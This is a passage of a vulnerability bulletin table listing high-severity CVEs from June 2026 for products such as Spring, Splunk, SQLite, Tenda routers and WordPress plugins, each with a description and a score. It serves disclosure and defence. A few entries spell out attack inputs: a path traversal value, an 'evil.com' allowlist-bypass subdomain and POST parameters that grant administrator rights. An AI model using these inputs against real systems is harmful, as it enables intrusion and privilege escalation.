| simplesamlphp--simplesamlphp-module-casserver | SimpleSAMLphp-casserver is a CAS 1.0 and 2.0 compliant CAS server in the form of a SimpleSAMLphp module. Prior to version 7.0.3, simplesamlphp-module-casserver builds file paths for the file-based CAS ticket store by directly concatenating the configured ticket directory with an attacker-controlled ticket identifier. Public CAS validation/proxy endpoints pass attacker-controlled ticket / pgt query parameters into this store. In deployments using FileSystemTicketStore, a remote attacker can use path traversal sequences such as ../target.serialized to make the CAS server read and unserialize files outside the ticket directory. In the CAS 1.0 validation flow, the same attacker-selected path is also passed to deleteTicket() immediately after getTicket() returns, which can delete the target file when it is readable by the PHP process, deletable under the PHP process filesystem permissions, and unserializes to a value compatible with the ?array return type. This issue has been patched in version 7.0.3. | 2026-06-09 | 8.6 | CVE-2026-46491 |
| sixstorage--6Storage Rentals | The 6Storage Rentals plugin for WordPress is vulnerable to Authorization Bypass Through User-Controlled Key in all versions up to and including 2.22.0 via the `userId` parameter of the `six_storage_get_user_info` and `six_storage_update_profile` AJAX actions. This is due to the `six_storage_getUserInfo()` and `six_storage_updateProfile()` functions being registered on `wp_ajax_nopriv_*` hooks and accepting a tenant identifier directly from `$_POST['userId']` without performing any ownership verification, session binding, or nonce validation to confirm the requester has a legitimate relationship to the supplied ID. This makes it possible for unauthenticated attackers to read and modify arbitrary tenants' profile data - including name, email address, phone number, physical address, and SSN - by supplying an enumerated `userId` value in a crafted request to either handler. | 2026-06-09 | 7.5 | CVE-2026-9185 |
| Skilja GmbH--Vinna Process Monitor | A Stored Cross-Site Scripting vulnerability in Vinna Process Monitor Version 4.0 Service Pack 1 (Build 63255) allows an authenticated remote attacker with low privileges to inject malicious JavaScript code into the application. This enables attackers to steal administrative access tokens and session credentials. | 2026-06-09 | 8.7 | CVE-2026-41031 |
| Soagen Informatics Technologies Software and Consulting Inc.--Apinizer | Improper neutralization of special elements used in an expression language statement ('expression language injection') vulnerability in Soagen Informatics Technologies Software and Consulting Inc. Apinizer allows Code Injection. This issue affects Apinizer: from 2026.04.0 before 2026.04.6. | 2026-06-11 | 9.8 | CVE-2026-11561 |
| SolidInvoice--SolidInvoice | SolidInvoice is an open-source invoicing platform. Prior to version 2.3.17, the company logo upload feature accepts any file type without validation. An authenticated administrator can upload an SVG file containing embedded JavaScript. This script is base64-encoded and injected unescaped into every page of the application, causing stored cross-site scripting (XSS) that executes in every authenticated user's browser. This issue has been patched in version 2.3.17. | 2026-06-11 | 8.1 | CVE-2026-46489 |
| SolidInvoice--SolidInvoice | SolidInvoice is an open-source invoicing platform. Prior to version 2.3.17, API tokens used to authenticate all REST API requests are stored as plaintext strings in the api_tokens database table. Any attacker who obtains read access to the database - through SQL injection, a leaked backup, a misconfigured replica, or insider access - immediately obtains all API credentials for every user with no further effort. This issue has been patched in version 2.3.17. | 2026-06-11 | 8.1 | CVE-2026-46622 |
| Sonaar--Sonaar Music Plugin | WordPress Sonaar Music Plugin 4.7 contains a stored cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts through the comment functionality. Attackers can submit JavaScript payloads in the comment parameter to wp-comments-post.php which are stored and executed in the browsers of users viewing the affected playlist pages. | 2026-06-08 | 7.2 | CVE-2023-54351 |
| SourceCodester--Class and Exam Timetabling System | A vulnerability was found in SourceCodester Class and Exam Timetabling System 1.0. The impacted element is an unknown function of the file /index2.php. The manipulation of the argument Password results in sql injection. It is possible to launch the attack remotely. The exploit has been made public and could be used. | 2026-06-08 | 7.3 | CVE-2026-11471 |
| SourceCodester--Class and Exam Timetabling System | A vulnerability was determined in SourceCodester Class and Exam Timetabling System 1.0. This affects an unknown function of the file /index1.php. This manipulation of the argument Password causes sql injection. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. | 2026-06-08 | 7.3 | CVE-2026-11472 |
| SourceCodester--Class and Exam Timetabling System | A vulnerability was identified in SourceCodester Class and Exam Timetabling System 1.0. The impacted element is an unknown function of the file /archive5.php. The manipulation of the argument sy leads to sql injection. The attack can be initiated remotely. The exploit is publicly available and might be used. | 2026-06-08 | 7.3 | CVE-2026-11482 |
| SourceCodester--Class and Exam Timetabling System | A security flaw has been discovered in SourceCodester Class and Exam Timetabling System 1.0. This affects an unknown function of the file /archive4.php. The manipulation of the argument sy results in sql injection. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-08 | 7.3 | CVE-2026-11483 |
| SourceCodester--Class and Exam Timetabling System | A weakness has been identified in SourceCodester Class and Exam Timetabling System 1.0. This impacts an unknown function of the file /archive3.php. This manipulation of the argument sy causes sql injection. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. | 2026-06-08 | 7.3 | CVE-2026-11484 |
| SourceCodester--Class and Exam Timetabling System | A security vulnerability has been detected in SourceCodester Class and Exam Timetabling System 1.0. Affected is an unknown function of the file /archive2.php. Such manipulation of the argument sy leads to sql injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. | 2026-06-08 | 7.3 | CVE-2026-11485 |
| SourceCodester--Class and Exam Timetabling System | A vulnerability was detected in SourceCodester Class and Exam Timetabling System 1.0. Affected by this vulnerability is an unknown functionality of the file /archive1.php. Performing a manipulation of the argument sy results in sql injection. Remote exploitation of the attack is possible. The exploit is now public and may be used. | 2026-06-08 | 7.3 | CVE-2026-11486 |
| SourceCodester--Hospitals Patient Records Management System | A security flaw has been discovered in SourceCodester Hospitals Patient Records Management System 1.0. This issue affects some unknown processing of the file /classes/Master.php?f=save_patient. The manipulation of the argument ID results in sql injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-08 | 7.3 | CVE-2026-11501 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.4 and 10.0.7, and Splunk Cloud Platform versions below 10.4.2604.3 and 10.2.2510.14, an unauthenticated user could create or truncate arbitrary files through a PostgreSQL sidecar service endpoint.<br><br>The vulnerability exists because the PostgreSQL sidecar service endpoint lacks authentication controls, allowing any network-reachable user to invoke file operations without credentials. | 2026-06-10 | 9.8 | CVE-2026-20253 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12, and 9.3.13, Splunk Cloud Platform versions below 10.3.2512.12, 10.2.2510.14, 10.1.2507.22, and 9.3.2411.132, and Splunk Secure Gateway versions below 3.10.6, 3.9.20, and 3.8.67, a low-privileged user that does not hold the 'admin' or 'power' Splunk roles could perform a Remote Code Execution (RCE) through the Splunk Secure Gateway app.<br><br>The Remote Code Execution is possible because of unsafe deserialization of App Key Value Store (KV Store) data through the 'jsonpickle' Python library, which reconstructs arbitrary Python objects from specially crafted JavaScript Object Notation (JSON) without adequate validation. | 2026-06-10 | 8.8 | CVE-2026-20251 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12, and 9.3.13, and Splunk Cloud Platform versions below 10.4.2604.3, 10.3.2512.12, 10.2.2510.14, 10.1.2507.22, and 9.3.2411.132, a low-privileged user that does not hold the "admin" or "power" Splunk roles could send server-side requests to arbitrary internal destinations through the Dashboard Studio PDF export feature. The vulnerability exists because the trusted-domain validation uses a prefix match that can be bypassed with attacker-controlled subdomains (for example, docs.splunk.com.evil.com), and because the PDF export service follows HTTP redirects automatically without re-validating each redirect target against the allowlist. | 2026-06-10 | 7.6 | CVE-2026-20252 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12, and 9.3.13, and Splunk Cloud Platform versions below 10.3.2512.11, 10.2.2510.15, 10.1.2507.23, and 9.3.2411.132, a low-privileged user that does not hold the "admin" or "power" Splunk roles could store a malicious script in a classic dashboard HTML panel, causing unauthorized JavaScript code to execute in the browser of another user. The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser. The low-privileged user should not be able to exploit the vulnerability at will. | 2026-06-10 | 7.1 | CVE-2026-20258 |
| Spring--Micrometer | In Micrometer, it is possible for a user to provide specially crafted gRPC requests that may cause a denial-of-service (DoS) condition. Affected versions: Micrometer 1.16.0 through 1.16.5; 1.15.0 through 1.15.11. | 2026-06-09 | 7.5 | CVE-2026-40983 |
| Spring--Micrometer | In Micrometer, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition. Affected versions: micrometer-core 1.16.0 through 1.16.5; 1.15.0 through 1.15.11; 1.14.0 through 1.14.15; 1.13.0 through 1.13.18; 1.9.0 through 1.9.17. micrometer-jetty11 1.16.0 through 1.16.5; 1.15.0 through 1.15.11; 1.14.0 through 1.14.15; 1.13.0 through 1.13.18. micrometer-jetty12 1.16.0 through 1.16.5; 1.15.0 through 1.15.11; 1.14.0 through 1.14.15; 1.13.0 through 1.13.18. | 2026-06-09 | 7.5 | CVE-2026-40984 |
| Spring--Spring Data Commons | Spring Data Commons applications may be vulnerable to denial of service through resource exhaustion when attacker-controlled property path strings are passed to MappingContext property path resolution. Affected versions: Spring Data Commons 4.0.0 through 4.0.5; 3.5.0 through 3.5.11; 3.4.0 through 3.4.14. | 2026-06-09 | 7.5 | CVE-2026-41695 |
| Spring--Spring Data Commons | Spring Data's internal property-lookup cache accepts and permanently retains attacker-supplied strings as cache keys, allowing heap exhaustion through repeated requests. Affected versions: Spring Data Commons 2.7.0 through 2.7.19; 3.3.0 through 3.3.16; 3.4.0 through 3.4.14; 3.5.0 through 3.5.11; 4.0.0 through 4.0.5. | 2026-06-09 | 7.5 | CVE-2026-41716 |
| Spring--Spring Data MongoDB | Spring Data MongoDB contains a SpEL (Spring Expression Language) expression injection vulnerability. The issue occurs during parameter binding when a user-defined repository query method is annotated with @Query and utilizes a capture-all placeholder. Affected versions: Spring Data MongoDB 5.0.0 through 5.0.5; 4.5.0 through 4.5.11; 4.4.0 through 4.4.14; 4.3.0 through 4.3.16; 4.2.0 through 4.2.15; 4.1.0 through 4.1.14; 4.0.0 through 4.0.15; 3.4.0 through 3.4.19. | 2026-06-09 | 8.1 | CVE-2026-41717 |
| Spring--Spring Data REST | Spring Data REST is vulnerable to SpEL expression injection through map-typed properties when processing JSON Patch (application/json-patch+json) requests. When a persistent entity exposes a Map-typed property, the JSON Pointer path segment used as the map key is embedded directly into a SpEL expression without sanitization or validation. Affected versions: Spring Data REST 3.7.0 through 3.7.19; 4.3.0 through 4.3.16; 4.4.0 through 4.4.14; 4.5.0 through 4.5.11; 5.0.0 through 5.0.5. | 2026-06-09 | 8.1 | CVE-2026-41729 |
| Spring--Spring Data REST | Spring Data REST's JSON Patch (application/json-patch+json) implementation does not apply the write-access filter to intermediate path segments when resolving a multi-segment JSON Pointer. Affected versions: Spring Data REST 3.7.0 through 3.7.19; 4.3.0 through 4.3.16; 4.4.0 through 4.4.14; 4.5.0 through 4.5.11; 5.0.0 through 5.0.5. | 2026-06-09 | 7.5 | CVE-2026-41728 |
| Spring--Spring for Apache Kafka | JsonKafkaHeaderMapper and the deprecated DefaultKafkaHeaderMapper matched type headers against trusted packages using a prefix check, meaning that trusting any package implicitly trusted all of its subpackages. Combined with Jackson's default bean deserialization, a producer could supply crafted header values that caused the consumer to deserialize arbitrary JDK types. Affected versions: Spring for Apache Kafka 4.0.0 through 4.0.5; 3.3.0 through 3.3.15; 3.2.0 through 3.2.13; 2.9.0 through 2.9.13; 2.8.0 through 2.8.11. | 2026-06-09 | 8.1 | CVE-2026-41731 |
| Spring--Spring for Apache Pulsar | JsonPulsarHeaderMapper matched type headers against trusted packages using a prefix check, meaning that trusting any package implicitly trusted all of its subpackages. Additionally, an empty trusted-packages configuration fell back to trusting all packages rather than applying a safe default allow-list. Affected versions: Spring for Apache Pulsar 2.0.0 through 2.0.5; 1.2.0 through 1.2.17; 1.1.0 through 1.1.17. | 2026-06-09 | 8.1 | CVE-2026-41732 |
| Spring--Spring for GraphQL | Spring for GraphQL applications are vulnerable to Unsafe Deserialization when processing paginated GraphQL queries. An attacker can craft a malicious GraphQL request that can lead to Remote Code Execution when the application exposes a paginated (Connection) field and the classpath contains specific classes that can be leveraged during deserialization. Affected versions: Spring for GraphQL 2.0.0 through 2.0.3; 1.4.0 through 1.4.5; 1.3.0 through 1.3.8. | 2026-06-11 | 8.1 | CVE-2026-41699 |
| Spring--Spring for GraphQL | Spring for GraphQL applications that have enabled the WebSocket transport are vulnerable to Cross-Site WebSocket Hijacking. An attacker can trick an authenticated user into visiting a malicious page, allowing the attacker to execute arbitrary GraphQL operations with the victim's credentials. Affected versions: Spring for GraphQL 2.0.0 through 2.0.3; 1.4.0 through 1.4.5; 1.3.0 through 1.3.8; 1.0.0 through 1.0.6. | 2026-06-11 | 8.1 | CVE-2026-41700 |
| Spring--Spring for GraphQL | The Spring GraphQL annotation detection mechanism for @Controller data fetchers may not correctly resolve annotations on methods within type hierarchies. This can be an issue if such annotations are used for authorization decisions. When all conditions are met, security annotations can be ignored at runtime. Affected versions: Spring for GraphQL 2.0.0 through 2.0.3; 1.4.0 through 1.4.5; 1.3.0 through 1.3.8; 1.0.0 through 1.0.6. | 2026-06-11 | 7.5 | CVE-2026-41856 |
| Spring--Spring Framework | In an untrusted JMS environment, org.springframework.jms.support.converter.MappingJackson2MessageConverter and org.springframework.jms.support.converter.JacksonJsonMessageConverter allow arbitrary class instantiation, which can lead to unauthorized actions via gadget class deserialization. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 8.1 | CVE-2026-41855 |
| Spring--Spring Framework | Spring MVC and WebFlux applications are vulnerable to Denial of Service (DoS) attacks when resolving static resources. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 7.5 | CVE-2026-41842 |
| Spring--Spring Framework | Due to incorrect escaping, the use of JavaScriptUtils.javaScriptEscape() may lead to JavaScript code injection in the browser, potentially resulting in a cross-site scripting (XSS) vulnerability. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 7.1 | CVE-2026-41845 |
| Spring--Spring Framework | An integer overflow vulnerability exists in the evaluation logic of the Spring Expression Language (SpEL). An attacker can exploit this by supplying a specially crafted SpEL expression that triggers excessive resource consumption, resulting in a Denial of Service (DoS). Affected versions: Spring Framework 5.3.0 through 5.3.48. | 2026-06-09 | 7.5 | CVE-2026-41849 |
| Spring--Spring Framework | Applications that evaluate user-supplied Spring Expression Language (SpEL) expressions are vulnerable to an Algorithmic Denial of Service (DoS). By providing a specially crafted expression, an attacker can trigger excessive resource consumption during evaluation, leading to application degradation or unavailability. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 7.5 | CVE-2026-41850 |
| Spring--Spring HATEOAS | Spring HATEOAS's internal PropertyUtils.createObjectFromProperties method, used by the Collection+JSON and UBER media type deserializers, performs bean property binding via reflection without consulting Jackson access-control annotations. Affected versions: Spring HATEOAS 1.5.0 through 1.5.6; 2.3.0 through 2.3.4; 2.4.0 through 2.4.1; 2.5.0 through 2.5.2; 3.0.0 through 3.0.3. | 2026-06-09 | 7.5 | CVE-2026-41006 |
| Spring--Spring HATEOAS | Spring HATEOAS maintains an unbounded static cache of StringLinkRelation instances keyed on attacker-supplied strings. Affected versions: Spring HATEOAS 1.5.0 through 1.5.6; 2.3.0 through 2.3.4; 2.4.0 through 2.4.1; 2.5.0 through 2.5.2; 3.0.0 through 3.0.3. | 2026-06-09 | 7.5 | CVE-2026-41007 |
| Spring--Spring Integration | A malicious or compromised FTP/SFTP/SMB server can write arbitrary files anywhere on the client filesystem (outside the configured local-directory) with attacker-controlled content. Affected versions: Spring Integration 7.0.0 through 7.0.4; 6.5.0 through 6.5.8; 6.4.0 through 6.4.11; 6.3.0 through 6.3.14; 5.5.0 through 5.5.20. | 2026-06-11 | 7.1 | CVE-2026-40987 |
| Spring--Spring LDAP | Spring LDAP's DirContextAuthenticationStrategy implementations do not reject a bind request where a non-empty username is paired with an empty or null password. Affected versions: Spring LDAP 2.4.0 through 2.4.4; 3.2.0 through 3.2.17; 3.3.0 through 3.3.7; 4.0.0 through 4.0.3. | 2026-06-09 | 7.4 | CVE-2026-41720 |
| Spring--Spring Security | An application using spring-security-saml2-service-provider and the REDIRECT binding for SAML 2.0 Login or Logout may be vulnerable to a denial of service by way of an unbounded writer that inflates the compressed SAML payload into memory. Affected versions: Spring Security 5.7.0 through 5.7.23; 5.8.0 through 5.8.25; 6.3.0 through 6.3.16; 6.4.0 through 6.4.16; 6.5.0 through 6.5.10; 7.0.0 through 7.0.5. | 2026-06-09 | 7.5 | CVE-2026-40988 |
| Spring--Spring Security | An attacker with write permissions to the database table managed by JdbcAssertingPartyMetadataRepository (saml2_asserting_party_metadata) may be able to store malicious serialized payloads in the columns containing the collection of verification or encryption credentials (verification_credentials and encryption_credentials, respectively). Affected versions: Spring Security 7.0.0 through 7.0.5. | 2026-06-09 | 7.3 | CVE-2026-40993 |
| Spring--Spring Security | An attacker able to influence values in RelyingPartyRegistration may be able to run arbitrary code on HTML forms generated by Spring Security filters. Affected versions: Spring Security 5.7.0 through 5.7.23; 5.8.0 through 5.8.25; 6.3.0 through 6.3.16; 6.4.0 through 6.4.16; 6.5.0 through 6.5.10; 7.0.0 through 7.0.5. | 2026-06-09 | 7.6 | CVE-2026-41003 |
| Spring--Spring Web Services | Wss4jSecurityInterceptor initialized its BSP (WS-I Basic Security Profile) compliance flag so that inbound validation disabled WSS4J BSP enforcement on RequestData. Services that validate WS-Security on the network could therefore accept messages that violate BSP rules, weakening protocol-level checks. Affected versions: Spring Web Services 5.0.0 through 5.0.1; 4.1.0 through 4.1.3; 4.0.0 through 4.0.18; 3.1.0 through 3.1.8. | 2026-06-11 | 8.2 | CVE-2026-40994 |
| Spring--Spring Web Services | Jaxp13XPathTemplate evaluated XPath expressions for StreamSource and SAXSource inputs using a code path that parsed attacker-controlled XML with the JDK's default DocumentBuilderFactory behavior instead of Spring's hardened parser configuration. Applications that evaluate XPath against untrusted XML payloads could therefore be exposed to XML External Entity (XXE) style attacks. Affected versions: Spring Web Services 5.0.0 through 5.0.1; 4.1.0 through 4.1.3; 4.0.0 through 4.0.18; 3.1.0 through 3.1.8. | 2026-06-11 | 8.2 | CVE-2026-40998 |
| Spring--Spring Web Services | When WS-Addressing is used with non-anonymous ReplyTo or FaultTo addresses, Spring WS may initiate outbound connections through configured WebServiceMessageSender instances to destinations taken directly from request headers without verifying that those destinations are safe to connect to. Affected versions: Spring Web Services 5.0.0 through 5.0.1; 4.1.0 through 4.1.3; 4.0.0 through 4.0.18; 3.1.0 through 3.1.8. | 2026-06-11 | 8.6 | CVE-2026-40999 |
| sqlfluff--sqlfluff | SQLFluff is a modular SQL linter and auto-formatter with support for multiple dialects and templated code. Prior to version 4.1.0, in deployments where untrusted users can provide SQL queries to be linted, an untrusted user can submit a malicious query with deliberate excessive nesting to any application using the parser to trigger a Denial of Service through resource exhaustion. This issue has been patched in version 4.1.0. | 2026-06-09 | 7.5 | CVE-2026-46373 |
| sqlfluff--sqlfluff | SQLFluff is a modular SQL linter and auto-formatter with support for multiple dialects and templated code. Prior to version 4.2.0, in deployments where untrusted users can provide SQL queries to be linted, an untrusted user can submit a malicious long query to any application using the parser to trigger a Denial of Service through resource exhaustion. This issue has been patched in version 4.2.0. | 2026-06-09 | 7.5 | CVE-2026-46374 |
| SQLite--SQLite | SQLite before 3.53.2 contains memory corruption vulnerabilities in the FTS5 full-text search extension that allow attackers to cause process crashes, memory exhaustion, or arbitrary code execution by supplying a crafted database with malformed FTS5 page data. Attackers can trigger an out-of-bounds read in fts5LeafSeek() via an attacker-controlled loop bound and a heap buffer overflow write in fts5ChunkIterate() through a crafted continuation page causing an integer underflow, exploitable when an FTS5 MATCH query is executed against the malicious database. | 2026-06-09 | 7.8 | CVE-2026-11822 |
| SQLite--SQLite | SQLite before 3.53.2 contains a heap-based buffer overflow vulnerability in the FTS5 full-text search extension that allows attackers to cause a crash or execute arbitrary code by supplying a crafted database with malicious continuation page metadata specifying a szLeaf value smaller than 4. Attackers can trigger an integer underflow in fts5ChunkIterate() causing an inflated remaining byte count during FTS5 MATCH query processing, leading to a heap buffer overflow of attacker-controlled data in applications compiled with SQLITE_ENABLE_FTS5. | 2026-06-09 | 7.8 | CVE-2026-11824 |
| STACKIT--IaaS API | STACKIT IaaS API contains a missing authorization check vulnerability that allows authenticated, low-privileged attackers to escalate privileges to full organization compromise by attaching arbitrary service accounts to virtual machines they control. Attackers can exploit the unvalidated PUT servers service-accounts endpoint to attach high-privileged service accounts and query the Instance Metadata Service to retrieve OAuth2 tokens, bypassing tenant boundaries and gaining unauthorized control over the entire organization environment. | 2026-06-08 | 9.8 | CVE-2026-39910 |
| stefanbohacek--fediverse-embeds-wordpress-plugin | Fediverse Embeds embeds fediverse posts on WordPress sites. Prior to version 1.5.8, Fediverse Embeds registered an unauthenticated REST route ftf/media-proxy (includes/Media_Proxy.php) with permission_callback => __return_true that accepted a base64-encoded URL and forwarded it to wp_remote_get($url) without enforcing any allowlist. The plugin's source contained a comment block explicitly acknowledging that the request should be validated against allowed fediverse domains, but in 1.5.7 the validation only set a local $can_download_media flag that was never read. The full response body was echoed back to the caller, so this was a full-read SSRF / open proxy reachable by any anonymous visitor. This issue has been patched in version 1.5.8. | 2026-06-11 | 7.5 | CVE-2026-46697 |
| steipete--summarize | Summarize before 0.17.0 contains a server-side request forgery vulnerability that allows attackers who control a podcast RSS feed to direct the host to fetch transcript content from loopback addresses, link-local addresses, RFC 1918 private ranges, or other reserved destinations by supplying malicious podcast:transcript URL values. Attackers can bypass protections through DNS rebinding and redirect-based techniques, as redirect targets are not revalidated and hostnames are not resolved before request dispatch, exposing internal service responses through the summarization flow. | 2026-06-11 | 7.4 | CVE-2026-53782 |
| stiofansisland--Events Calendar for GeoDirectory | The Events Calendar for GeoDirectory plugin for WordPress is vulnerable to Privilege Escalation in versions up to and including 2.3.28. This is due to the ajax_ayi_action() handler only applying strip_tags(esc_sql()) - with no allow-list - to the attacker-controlled $_POST['type'] and $_POST['postid'] values before forwarding them to update_ayi_data(), which calls update_user_meta($current_user->ID, $rsvp_args['type'], $posts). By passing type=wp_capabilities and postid=administrator, an attacker writes ['subscriber'=>true,'administrator'=>'administrator'] into their own wp_capabilities user meta; WP_User::get_role_caps() then treats the 'administrator' array key as an active role on the next request. This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to Administrator. | 2026-06-09 | 8.8 | CVE-2026-11616 |
| sveltejs--devalue | Svelte devalue is a JavaScript library that serializes values into strings when JSON.stringify isn't sufficient for the job. From version 5.6.3 to before version 5.8.1, devalue.parse could, due to quirks in some JavaScript engines, be convinced to allocate much more memory than was needed when deserializing sparse arrays, leading to excessive memory consumption. This issue has been patched in version 5.8.1. | 2026-06-09 | 7.5 | CVE-2026-42570 |
| Systerel--S2OPC | Improper comparison with the certificates trusted list in S2OPC allows an attacker well-formed untrusted certificate to be considered trusted | 2026-06-10 | 7.3 | CVE-2026-9758 |
| tale--headplane | Headplane is a feature-complete Web UI for Headscale. Prior to versions 0.6.3 and 0.7.0-beta.3, Headplane was vulnerable to a path traversal / authorization bypass in the Headscale API client used by node and user rename operations. This issue has been patched in versions 0.6.3 and 0.7.0-beta.3. | 2026-06-08 | 8.1 | CVE-2026-46484 |
| taosdata--TDengine | TDengine is an open source, time-series database optimized for Internet of Things devices. In versions 3.4.0.0 through 3.4.1.5, an unauthenticated remote attacker can crash the taosd server process by sending a single crafted RPC packet. No credentials or prior session state are required. Version 3.4.1.6 fixes the issue. | 2026-06-10 | 7.5 | CVE-2026-42542 |
| Tenda--AC18 | A vulnerability was found in Tenda AC18 15.03.05.05. The affected element is the function sub_45304 of the file /goform/getRebootStatus of the component Web Management Interface. The manipulation of the argument callback results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been made public and could be used. | 2026-06-08 | 8.8 | CVE-2026-11528 |
| Tenda--CX12L | A security vulnerability has been detected in Tenda CX12L 16.03.53.12. The affected element is the function form_fast_setting_wifi_set of the file /goform/fast_setting_wifi_set of the component Wi-Fi Configuration Endpoint. Such manipulation of the argument ssid leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. | 2026-06-08 | 8.8 | CVE-2026-11503 |
| Tenda--CX12L | A vulnerability was detected in Tenda CX12L 16.03.53.12. The impacted element is the function setSchedWifi of the file /goform/openSchedWifi of the component Wi-Fi Schedule Configuration Endpoint. Performing a manipulation of the argument schedStartTime/schedEndTime results in stack-based buffer overflow. The attack may be initiated remotely. The exploit is now public and may be used. | 2026-06-08 | 8.8 | CVE-2026-11504 |
| Tenda--F451 | A security flaw has been discovered in Tenda F451 1.0.0.7/1.0.0.9. Impacted is the function formWriteFacMac of the file /goform/WriteFacMac of the component Web Management Interface. Performing a manipulation of the argument mac results in os command injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. | 2026-06-08 | 8.8 | CVE-2026-11556 |
| Tenda--F451 | A weakness has been identified in Tenda F451 1.0.0.7/1.0.0.9. The affected element is the function fromNatlimit of the file /goform/Natlimit of the component Web Management Interface. Executing a manipulation of the argument page can lead to stack-based buffer overflow. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. | 2026-06-08 | 8.8 | CVE-2026-11557 |
| Tenda--HG7HG9 | A vulnerability was determined in Tenda HG7HG9 and HG10 300001138_en_xpon. This affects the function formDOMAINBLK of the file /boaform/formDOMAINBLK. Executing a manipulation of the argument blkDomain can lead to stack-based buffer overflow. The attack may be performed from remote. | 2026-06-08 | 9.8 | CVE-2026-11499 |
| Tenda--HG7HG9 | A vulnerability was found in Tenda HG7HG9 and HG10 300001138_en_xpon. Affected by this issue is the function asp_voip_OtherSet of the file /boaform/voip_other_set of the component Web Management Interface. Performing a manipulation of the argument funckey_transfer results in stack-based buffer overflow. The attack is possible to be carried out remotely. | 2026-06-08 | 8.8 | CVE-2026-11498 |
| Tenda--HG7HG9 | A vulnerability was found in Tenda HG7HG9 and HG10 300001138_en_xpon. This affects the function formPPPEdit of the file /boaform/formPPPEdit. The manipulation of the argument encodename results in stack-based buffer overflow. The attack can be launched remotely. The exploit has been made public and could be used. | 2026-06-08 | 8.8 | CVE-2026-11553 |
| Tenda--W20E | A vulnerability was detected in Tenda W20E 15.11.0.6. This vulnerability affects the function formSetPortMirror of the file /goform/setPortMirror. Performing a manipulation of the argument portMirrorMirroredPorts results in stack-based buffer overflow. The attack can be initiated remotely. The exploit is now public and may be used. | 2026-06-08 | 8.8 | CVE-2026-11522 |
| Tenda--W20E | A flaw has been found in Tenda W20E 15.11.0.6. This issue affects the function formPortalAuth of the file /goform/PortalAuth of the component Web Management Interface. Executing a manipulation of the argument gotoUrl can lead to stack-based buffer overflow. The attack can be launched remotely. The exploit has been published and may be used. | 2026-06-08 | 8.8 | CVE-2026-11523 |
| Tenda--W20E | A vulnerability has been found in Tenda W20E 15.11.0.6. Impacted is the function modifyWifiFilterRules of the file /goform/modifyWifiFilterRules of the component Web Management Interface. The manipulation of the argument wifiFilterListRemark leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2026-06-08 | 8.8 | CVE-2026-11524 |
| Themeisle--Woody Code Snippets | WordPress Insert PHP plugin versions before 3.3.1 contain a PHP code injection vulnerability that allows unauthenticated attackers to execute arbitrary PHP code by injecting malicious shortcodes through the WordPress REST API. Attackers can send POST requests to the wp-json/wp/v2/posts endpoint with crafted content containing insert_php shortcodes to include and execute remote PHP files on the server. | 2026-06-09 | 9.8 | CVE-2017-20251 |
| Ubiquiti Inc--UDM | Under certain network configurations, a malicious actor with access to network could exploit an Improper Access Control vulnerability found in certain devices running UniFi OS to make unauthorized changes to such UniFi OS devices. | 2026-06-12 | 8.1 | CVE-2026-48610 |
| Ubiquiti Inc--UID Enterprise Agent | A malicious actor with access to the network and low privileges could exploit an Improper Input Validation vulnerability found in UID Enterprise Agent to execute a Command Injection on the host device. | 2026-06-12 | 9.9 | CVE-2026-47367 |
| Ubiquiti Inc--UniFi OS Server | A malicious actor with access to the network and low privileges could exploit an Improper Input Validation vulnerability found in certain devices running UniFi OS to escalate privileges within such UniFi OS devices or instances. | 2026-06-12 | 9.9 | CVE-2026-47369 |
| Ubiquiti Inc--UniFi OS Server | A malicious actor with access to the network and low privileges could exploit an Improper Input Validation vulnerability found in certain devices running UniFi OS to execute a Command Injection within such UniFi OS devices or instances. | 2026-06-12 | 9.9 | CVE-2026-47370 |
| Ubiquiti Inc--UniFi OS Server | A malicious actor with access to the network could exploit a Path Traversal vulnerability found in certain devices running UniFi OS to obtain data from such UniFi OS devices or instances. | 2026-06-12 | 8.6 | CVE-2026-47368 |
| UTT--HiPER 2610G | A vulnerability was determined in UTT HiPER 2610G up to 3.0.0-171107. This impacts the function strcpy of the file /goform/formConfigDnsFilterGlobal. Executing a manipulation of the argument GroupName can lead to buffer overflow. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. | 2026-06-08 | 8.8 | CVE-2026-11517 |
| VMware--VCF operations | VMware Cloud Foundation Operations contains multiple stored cross-site scripting vulnerabilities.A malicious actor with privileges to create policies, views or text-widgets may be able to inject scripts to perform administrative actions in VMware Cloud Foundation Operations. | 2026-06-08 | 8 | CVE-2026-41722 |
| VMware--VCF operations | VMware Cloud Foundation Operations contains multiple stored cross-site scripting vulnerabilities.A malicious actor with privileges to create policies, views or text-widgets may be able to inject scripts to perform administrative actions in VMware Cloud Foundation Operations. | 2026-06-08 | 8 | CVE-2026-41723 |
